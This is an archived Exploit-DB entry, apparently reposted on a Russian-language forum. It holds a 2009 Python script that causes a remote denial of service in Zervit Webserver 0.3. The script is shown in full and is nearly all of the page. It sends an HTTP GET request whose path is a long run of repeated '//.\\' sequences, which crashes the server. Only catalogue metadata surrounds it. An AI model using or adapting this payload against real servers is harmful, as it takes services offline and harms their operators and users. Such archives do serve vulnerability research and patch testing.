- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8500
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- SHINNAI
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2009-04-21
		Код:
	
	import socket
import sys
print "------------------------------------------------------"
print " Zervit Webserver 0.3 Remote Denial Of Service        "
print " url: http://zervit.sourceforge.net                   "
print "                                                      "
print " author: shinnai                                      "
print " mail: shinnai[at]autistici[dot]org                   "
print " site: http://www.shinnai.net                         "
print "                                                      "
print " greets to: e.wiZz! for inspiration. Be safe man...   "
print "                                                      "
print " dedicated to: all those tried to own my site :-p     "
print "------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
       buff = "//.\\" * 330
       request =  "GET " + buff + " HTTP/1.0"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       raw_input('\n\nExploit completed. Press "Enter" to quit...')
       sys.exit
except:
       raw_input('\n\nUnable to connect. Press "Enter" to quit...')
# milw0rm.com [2009-04-21]- Источник
- www.exploit-db.com
 
 
		